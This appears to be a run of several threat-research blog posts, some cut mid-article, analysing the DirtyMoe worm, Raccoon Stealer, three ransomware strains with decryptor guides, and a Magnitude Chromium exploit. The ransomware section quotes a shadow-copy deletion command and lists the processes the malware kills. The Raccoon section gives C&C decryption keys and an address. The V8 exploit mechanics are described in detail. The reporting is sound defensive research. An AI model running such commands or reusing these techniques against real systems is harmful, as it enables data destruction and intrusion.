Each generated and verified IP is associated with a timestamp of creation. The last phase is activated if the previous timestamp is older than 10 minutes, i.e., if the IP generation is suspended for any reason and no new IPs come in 10 minutes. Then one dedicated thread extracts IPs from the backlog and processes these IPs from the beginning; These IPs are processed as per Phase 2, and the whole worming process continues.
6.4 Dictionary Attack
The dictionary attack targets two administrator user names, namely administrator for SMB services and sa for MS SQL servers. If the attack is successful, the worming module infiltrates a targeted system utilizing an attack series composed of techniques described in Section 5:
Service Control Manager Remote Protocol (SCMR)
Windows Management Instrumentation (WMI)
Microsoft SQL Server (SQL)
The first attack attempt is sent with an empty password. The module then addresses three states based on the attack response as follows:
No connection: the connection was not established, although a targeted port is open – a targeted service is not available on this port.
Unsuccessful: the targeted service/system is available, but authentication failed due to an incorrect username or password.
Success: the targeted service/system uses the empty password.
Administrator account has an empty password
If the administrator account is not protected, the whole worming process occurs quickly (this is the best possible outcome from the attacker’s point of view). The worming module then proceeds to infiltrate the targeted system with the attack series (SCMR, WMI, SQL) by sending the empty password.
Bad username or authentication information
A more complex situation occurs if the targeted services are active, and it is necessary to attack the system by applying the password dictionary.
Cleverly, the module stores all previously successful passwords in the system registry; the first phase of the dictionary attack iterates through all stored passwords and uses these to attack the targeted system. Then, the attack series (SCMR, WMI, SQL) is started if the password is successfully guessed.
The second phase occurs if the stored registry passwords yield no success. The module then attempts authentication using a defined number of initial passwords from the password dictionary. This number is specified by the X1 configuration parameters (usually X1*100). If this phase is successful, the guessed password is stored in the system registry, and the attack series is initiated.
The final phase follows if the second phase is not successful. The module randomly chooses a password from a dictionary subset X2*100 times. The subset is defined as the original dictionary minus the first X1*100 items. In case of success, the attack series is invoked, and the password is added to the system registry.
Successfully used passwords are stored encrypted, in the following system registry location: HKEY_LOCAL_MACHINE\Software\Microsoft\DirectPlay8\Direct3D\RegRunInfo-BarkIPsInfo
7. Summary and Discussion
Modules
We have detected three versions of the DirtyMoe worming module in use. Two versions specifically focus on the SMB service and MS SQL servers. However, the third contains several artifacts implying other attack vectors targeting PHP, Java Deserialization, and Oracle Weblogic Server. We continue to monitor and track these activities.
Attacked Machines
One interesting finding is an attack adaptation based on the geological location of the worming module. Methods described in Section 4 try to distribute the generated IP addresses evenly to cover the largest possible radius. This is achieved using the IP address of the worming module itself since half of the threads generating the victim’s IPs are based on the module IP address. Otherwise, if the IP is not available for some reason, the IP address 98.126.89.1 located in Los Angeles is used as the base address.
We performed a few VPN experiments for the following locations: the United States, Russian Federation, Czech Republic, and Taiwan. The results are animated in Figure 17; Table 1 records the attack distributions for each tested VPN.
VPN
Attack Distribution
Top countries
United States
North America (59%) Europe (21%) Asia (16%)
United States
Russian Federation
North America (41%) Europe (33%) Asia (20%)
United States, Iran, United Kingdom, France, Russian Federation
Czech Republic
Europe (56%) Asia (14%) South America (11%)
China, Brazil, Egypt, United States, Germany
Taiwan
North America (47%) Europe (22%) Asia (18%)
United States, United Kingdom, Japan, Brazil, Turkey
Table 1. VPN attack distributions and top countries
LAN
Perhaps the most striking discovery was the observed lateral movement in local networks. The module keeps all successfully guessed passwords in the system registry; these saved passwords increase the probability of password guessing in local networks, particularly in home and small business networks. Therefore, if machines in a local network use the same weak passwords that can be easily assessed, the module can quickly infiltrate the local network.
Exploits
All abused exploits are from publicly available resources. We have identified six main vulnerabilities summarized in Table 2. The worming module adopts the exact implementation of EternalBlue, ThinkPHP, and Oracle Weblogic Server exploits from exploit-db. In the same way, the module applies and modifies implementations of DoublePulsar, Tater, and PowerSploit frameworks.
ID
Description
CVE:2019-9082
ThinkPHP – Multiple PHP Injection RCEs
CVE:2019-2725
Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
CVE:2019-1458
WizardOpium Local Privilege Escalation
CVE:2018-0147
Deserialization Vulnerability
CVE:2017-0144
EternalBlue SMB Remote Code Execution (MS17-010)
MS15-076
RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Table 2. Used exploits
C&C Servers
The C&C servers determine which module will be deployed on a victim machine. The mechanism of the worming module selection depends on client information additionally sent to the C&C servers. However, details of how this module selection works remain to be discovered.
Password Dictionary
The password dictionary is a collection of the most commonly used passwords obtained from the internet. The dictionary size is 100,000 words and numbers across several topics and languages. There are several language mutations for the top world languages, e.g., English, Spanish, Portuguese, German, French, etc. (passwort, heslo, haslo, lozinka, parool, wachtwoord, jelszo, contrasena, motdepasse). Other topics are cars (volkswagen, fiat, hyundai, bugatti, ford) and art (davinci, vermeer, munch, michelangelo, vangogh). The dictionary also includes dirty words and some curious names of historical personalities like hitler, stalin, lenin, hussein, churchill, putin, etc.
The dictionary is used for SCMR, WMI, and SQL attacks. However, the SQL module hard-codes another 15 pairs of usernames/passwords also collected from the internet. The SQL passwords usually are default passwords of the most well-known systems.
Worming Workflow
The modules also implement a technique for repeated attacks on machines with ‘live’ targeted ports, even when the first attack was unsuccessful. The attacks can be scheduled hourly or daily based on the worm configuration. This approach can prevent a firewall from blocking an attacking machine and reduce the risk of detection.
Another essential attribute is the closing of TCP port 445 port following a successful exploit of a targeted system. This way, compromised machines are “protected” from other malware that abuse the same vulnerabilities. The MSI installer also includes a mechanism to prevent overwriting DirtyMoe by itself so that the configuration and already downloaded modules are preserved.
IP Generation Performance
The primary key to this worm’s success is the performance of the IP generator. We have used empirical measurement to determine the performance of the worming module. This measurement indicates that one module instance can generate and attack 1,500 IPs per second on average. However, one of the tested instances could generate up to 6,000 IPs/sec, so one instance can try two million IPs per day.
The evidence suggests that approximately 1,900 instances can generate the whole IPv4 range in one day; our detections estimate more than 7,000 active instances exist in the wild. In theory, the effect is that DirtyMoe can generate and potentially target the entire IPv4 range three times a day.
8. Conclusion
The primary goal of this research was to analyze one of the DirtyMoe module groups, which provides the spreading of the DirtyMoe malware using worming techniques. The second aim of this study was to investigate the effects of worming and investigate which exploits are in use.
In most cases, DirtyMoe is deployed using external exploit kits like PurpleFox or injected installers of Telegram Messenger that require user interaction to successful infiltration. Importantly, worming is controlled by C&C and executed by active DirtyMoe instances, so user interaction is not required.
Worming target IPs are generated utilizing the cleverly designed algorithm that evenly generates IP addresses across the world and in relation to the geological location of the worming module. Moreover, the module targets local/home networks. Because of this, public IPs and even private networks behind firewalls are at risk.
Victims’ active machines are attacked using EternalBlue exploits and dictionary attacks aimed at SCMR, WMI, and MS SQL services with weak passwords. Additionally, we have detected a total of six vulnerabilities abused by the worming module that implement publicly disclosed exploits.
We also discovered one worming module in development containing other vulnerability exploit implementations – it did not appear to be fully armed for deployment. However, there is a chance that tested exploits are already implemented and are spreading in the wild.
Based on the amount of active DirtyMoe instances, it can be argued that worming can threaten hundreds of thousands of computers per day. Furthermore, new vulnerabilities, such as Log4j, provide a tremendous and powerful opportunity to implement a new worming module. With this in mind, our researchers continue to monitor the worming activities and hunt for other worming modules.
IOCs
CVE-2019-1458: “WizardOpium’ Local Privilege Escalation fef7b5df28973ecf8e8ceffa8777498a36f3a7ca1b4720b23d0df18c53628c40
We recently came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses.
Raccoon Stealer is a password stealer capable of stealing not just passwords, but various types of data, including:
Cookies, saved logins and forms data from browsers
Login credentials from email clients and messengers
Files from crypto wallets
Data from browser plugins and extension
Arbitrary files based on commands from C&C
In addition, it’s able to download and execute arbitrary files by command from its C&C. In combination with active development and promotion on underground forums, Raccoon Stealer is prevalent and dangerous.
The oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019. Its authors have stated the same month as the start of selling the malware on underground forums. Since then, it has been updated many times. According to its authors, they fixed bugs, added features, and more.
Distribution
We’ve seen Raccoon distributed via downloaders: Buer Loader and GCleaner. According to some samples, we believe it is also being distributed in the form of fake game cheats, patches for cracked software (including hacks and mods for Fortnite, Valorant, and NBA2K22), or other software. Taking into account that Raccoon Stealer is for sale, it’s distribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while some are protected using Themida or malware packers. Worth noting is that some samples were packed more than five times in a row with the same packer!
Technical details
Raccoon Stealer is written in C/C++ and built using Visual Studio. Samples have a size of about 580-600 kB. The code quality is below average, some strings are encrypted, some are not.
Once executed, Racoon Stealer starts checking for the default user locale set on the infected device and won’t work if it’s one of the following:
Russian
Ukrainian
Belarusian
Kazakh
Kyrgyz
Armenian
Tajik
Uzbek
C&C communications
The most interesting thing about this stealer is its communication with C&Cs. There are four values crucial for its C&C communication, which are hardcoded in every Raccoon Stealer sample:
MAIN_KEY. This value has been changed four times during the year.
URLs of Telegram gates with channel name. Gates are used not to implement a complicated Telegram protocol and not to store any credentials inside samples
BotID – hexadecimal string, sent to the C&C every time
TELEGRAM_KEY – a key to decrypt the C&C address obtained from Telegram Gate
Let’s look at an example to see how it works: 447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b unpacked to: f1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232:
First of all, MAIN_KEY is decrypted. See the decryption code in the image below:
In this example, the MAIN_KEY is jY1aN3zZ2j. This key is used to decrypt Telegram Gates URLs and BotID.
This example decodes and decrypts Telegram Gate URLs. It is stored in the sample as: Rf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQIEzdvSl5HWSzlFRuIjBmOLmgH/V84PCRFevc40ZuTAZUq+q1JywL+G/1xzXQdYZiKWea8ODgaN+4B8cT3AqbHmY5+6MHEBWTqTsITPAxKdPMu3dC9nwdBF3nlvmX4/q/gSPflYF7aIU1wFhZxViWq2 After decoding Base64 it has this form:
Decrypting this binary data with RC4 using MAIN_KEY gives us a string with Telegram Gates:
The stealer has to get it’s real C&C. To do so, it requests a Telegram Gate, which returns an HTML-page:
Here you can see a Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32 The prefix (always five characters) and postfix (always six characters) are removed and it becomes mD/ry6GYdwNuXl10SYoVBR7/tFgp The Base64 is then decoded to obtain an encrypted C&C URL:
The TELEGRAM_KEY in this sample is a string 739b4887457d3ffa7b811ce0d03315ce and the Raccoon uses it as a key to RC4 algorithm to finally decrypt the C&C URL: http://91.219.236[.]18/
Raccoon makes a query string with PC information (machine GUID and user name), and BotID
Query string is encrypted with RC4 using a MAIN_KEY and then encoded with Base64.
This data is sent using POST to the C&C, and the response is encoded with Base64 and encrypted with the MAIN_KEY. Actually, it’s a JSON with a lot of parameters and it looks like this:
Thus, the Telegram infrastructure is used to store and update actual C&C addresses. It looks quite convenient and reliable until Telegram decides to take action.
Analysis
The people behind Raccoon Stealer
Based on our analysis of seller messages on underground forums, we can deduce some information about the people behind the malware. Raccoon Stealer was developed by a team, some (or maybe all) members of the team are Russian native speakers. Messages on the forum are written in Russian, and we assume they are from former USSR countries because they try to prevent the Stealer from targeting users in these countries.
Possible names/nicknames of group members may be supposed based on the analysis of artifacts, found in samples:
C:\Users\a13xuiop1337\
C:\Users\David\
Prevalence
Raccoon Stealer is quite prevalent: from March 3, 2021 - February 17, 2022 our systems detected more than 25,000 Raccoon-related samples. We identified more than 1,300 distinct configs during that period.
Here is a map, showing the number of systems Avast protected from Raccoon Stealer from March 3, 2021 - February 17, 2022. In this time frame, Avast protected nearly 600,000 Raccoon Stealer attacks.
The country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don’t want to infect computers in Russia or Central Asia. We believe the attacks spray and pray, distributing the malware around the world. It’s not until it makes it onto a system that it begins checking for the default locale. If it is one of the language listed above, it won’t run. This explains why we detected so many attack attempts in Russia, we block the malware before it can run, ie. before it can even get to the stage where it checks for the device’s locale. If an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would stiIl become infected.
Telegram Channels
From the more than 1,300 distinct configs we extracted, 429 of them are unique Telegram channels. Some of them were used only in a single config, others were used dozens of times. The most used channels were:
jdiamond13 – 122 times
jjbadb0y – 44 times
nixsmasterbaks2 – 31 times
hellobyegain – 25 times
h_smurf1kman_1 – 24 times
Thus, five of the most used channels were found in about 19% of configs.
Malware distributed by Raccoon
As was previously mentioned, Raccoon Stealer is able to download and execute arbitrary files from a command from C&C. We managed to collect some of these files. We collected 185 files, with a total size 265 Mb, and some of the groups are:
Downloaders – used to download and execute other files
Clipboard crypto stealers – change crypto wallet addresses in the clipboard – very popular (more than 10%)
WhiteBlackCrypt Ransomware
Servers used to download this software
We extracted unique links to other malware from Raccoon configs received from C&Cs, it was 196 unique URLs. Some analysis results:
43% of URLs have HTTP scheme, 57% – HTTPS.
83 domain names were used.
About 20% of malware were placed on Discord CDN
About 10% were served from aun3xk17k[.]space
Conclusion
We will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C&Cs, Telegram channels, and downloaded samples. We predict it may be used wider by other cybercrime groups. We assume the group behind Raccoon Stealer will further develop new features, including new software to steal data from, for example, as well as bypass protection this software has in place.
Avast Releases Decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Prometheus tries to thwart malware analysis by killing various processes like packet sniffing, debugging or tools for inspecting PE files. Then, it generates a random password that is used during the Salsa20 encryption.
Prometheus looks for available local drives to encrypt files that have one of the following extensions:
db dbf accdb dbx mdb mdf epf ndf ldf 1cd sdf nsf fp7 cat log dat txt jpeg gif jpg png php cs cpp rar zip html htm xlsx xls avi mp4 ppt doc docx sxi sxw odt hwp tar bz2 mkv eml msg ost pst edb sql odb myd php java cpp pas asm key pfx pem p12 csr gpg aes vsd odg raw nef svg psd vmx vmdk vdi lay6 sqlite3 sqlitedb java class mpeg djvu tiff backup pdf cert docm xlsm dwg bak qbw nd tlg lgb pptx mov xdw ods wav mp3 aiff flac m4a csv sql ora dtsx rdl dim mrimg qbb rtf 7z
Encrypted files are given a new extension .[ID-<PC-ID>].unlock. After the encryption process is completed, Notepad is executed with a ransom note from the file UNLOCK_FILES_INFO.txt informing victims on how to pay the ransom if they want to decrypt their files.
How to use the Avast decryptor to decrypt files encrypted by Prometheus Ransomware
Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
On the third page, you need to provide a file in its original form and encrypted by the Prometheus ransomware. Enter both names of the files. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During the password cracking process, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you the option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
When the password is found, you can proceed to decrypt all encrypted files on your PC by clicking “Next”.
On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.
On February 24th, the Avast Threat Labs discovered a new ransomware strain accompanying the data wiper HermeticWiper malware, which our colleagues at ESET found circulating in the Ukraine. Following this naming convention, we opted to name the strain we found piggybacking on the wiper, HermeticRansom. According to analysis done byCrowdstrike’s Intelligence Team, the ransomware contains a weakness in the crypto schema and can be decrypted for free.
If your device has been infected with HermeticRansom and you’d like to decrypt your files, click here to skip to the How to use the Avast decryptor to recover files
Go!
The ransomware is written in GO language. When executed, it searches local drives and network shares for potentially valuable files, looking for files with one of the extensions listed below (the order is taken from the sample):
In order to keep the victim’s PC operational, the ransomware avoids encrypting files in Program Files and Windows folders.
For every file designated for encryption, the ransomware creates a 32-byte encryption key. Files are encrypted by blocks, each block has 1048576 (0x100000) bytes. A maximum of nine blocks are encrypted. Any data past 9437184 bytes (0x900000) is left in plain text. Each block is encrypted by AES GCM symmetric cipher. After data encryption, the ransomware appends a file tail, containing the RSA-2048 encrypted file key. The public key is stored in the binary as a Base64 encoded string:
When done, a file named “read_me.html” is saved to the user’s Desktop folder:
There is an interesting amount of politically oriented strings in the ransomware binary. In addition to the file extension, referring to the re-election of Joe Biden in 2024, there is also a reference to him in the project name:
During the execution, the ransomware creates a large amount of child processes, that do the actual encryption:
How to use the Avast decryptor to recover files
To decrypt your files, please, follow these steps:
Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next“
On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.
On January 25, 2022, a victim of a ransomware attack reached out to us for help. The extension of the encrypted files and the ransom note indicated the TargetCompany ransomware (not related to Target the store), which can be decrypted under certain circumstances.
Modus Operandi of the TargetCompany Ransomware
When executed, the ransomware does some actions to ease its own malicious work:
Assigns the SeTakeOwnershipPrivilege and SeDebugPrivilege for its process
Deletes special file execution options for tools like vssadmin.exe, wmic.exe, wbadmin.exe, bcdedit.exe, powershell.exe, diskshadow.exe, net.exe and taskkil.exe
Removes shadow copies on all drives using this command: %windir%\sysnative\vssadmin.exe delete shadows /all /quiet
Kills some processes that may hold open valuable files, such as databases:
List of processes killed by the TargetCompany ransomware
MsDtsSrvr.exe
ntdbsmgr.exe
ReportingServecesService.exe
oracle.exe
fdhost.exe
sqlserv.exe
fdlauncher.exe
sqlservr.exe
msmdsrv.exe
sqlwrite
mysql.exe
After these preparations, the ransomware gets the mask of all logical drives in the system using the GetLogicalDrives() Win32 API. Each drive is checked for the drive type by GetDriveType(). If that drive is valid (fixed, removable or network), the encryption of the drive proceeds. First, every drive is populated with the ransom note file (named RECOVERY INFORMATION.txt). When this task is complete, the actual encryption begins.
Exceptions
To keep the infected PC working, TargetCompany avoids encrypting certain folders and file types:
List of folders avoided by the TargetCompany ransomware
msocache
boot
Microsoft Security Client
Microsoft MPI
$windows.~ws
$windows.~bt
Internet Explorer
Windows Kits
system volume information
mozilla
Reference
Microsoft.NET
intel
boot
Assemblies
Windows Mail
appdata
windows.old
Windows Defender
Microsoft Security Client
perflogs
Windows
Microsoft ASP.NET
Package Store
programdata google application data
WindowsPowerShell
Core Runtime
Microsoft Analysis Services
tor browser
Windows NT
Package
Windows Portable Devices
Windows
Store
Windows Photo Viewer
Common Files
Microsoft Help Viewer
Windows Sidebar
List of file types avoided by the TargetCompany ransomware
.386
.cpl
.exe
.key
.msstyles
.rtp
.adv
.cur
.hlp
.lnk
.msu
.scr
.ani
.deskthemepack
.hta
.lock
.nls
.shs
.bat
.diagcfg
.icl
.mod
.nomedia
.spl
.cab
.diagpkg
.icns
.mpa
.ocx
.sys
.cmd
.diangcab
.ico
.msc
.prf
.theme
.com
.dll
.ics
.msi
.ps1
.themepack
.drv
.idx
.msp
.rom
.wpx
The ransomware generates an encryption key for each file (0x28 bytes). This key splits into Chacha20 encryption key (0x20 bytes) and n-once (0x08) bytes. After the file is encrypted, the key is protected by a combination of Curve25519 elliptic curve + AES-128 and appended to the end of the file. The scheme below illustrates the file encryption. Red-marked parts show the values that are saved into the file tail after the file data is encrypted:
The exact structure of the file tail, appended to the end of each encrypted file, is shown as a C-style structure:
Every folder with an encrypted file contains the ransom note file. A copy of the ransom note is also saved into c:\HOW TO RECOVER !!.TXT
The personal ID, mentioned in the file, is the first six bytes of the personal_id, stored in each encrypted file.
How to use the Avast decryptor to recover files
To decrypt your files, please, follow these steps:
Download the free Avast decryptor. Choose a build that corresponds with your Windows installation. The 64-bit version is significantly faster and most of today’s Windows installations are 64-bit.
If you have 64-bit Windows, choose the 64-bit build.
If you have 32-bit Windows, choose the 32-bit build.
Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next”
On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
On the third page, you need to enter the name of a file encrypted by the TargetCompany ransomware. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During password cracking, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you an option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
When the password is found, you can proceed to the decryption of files on your PC by clicking “Next”.
On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.
In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.
We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but none other did, as far as we can tell. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still continues to use these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts are targeting Chromium-based browsers.
This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts into why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.
Exploit Kit Theory
To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.
The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.
So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.
Prevalence of the vulnerability The more users are affected by the vulnerability, the more attractive it is to the attackers.
Exploit reliability Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
Difficulty of exploit development This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
Targeting precision The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
Expected vulnerability lifetime As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective is the patching process of the affected software.
Exploit detectability The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect.
Exploit potential Some exploits give the attackers System, while others might make them only end up inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with other LPE exploits, or they place limits on what the final malicious payload is able to do.
Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.
A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low, that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often heavily rely on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and costly to manage.
Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.
It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.
CVE-2021-21224
Let’s now take a closer look at the Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on Github on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.
It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…
Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply for V8 exploitation in general and so are used in the later stages of the Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.
The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length).
Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now too possible to read and write past its end.
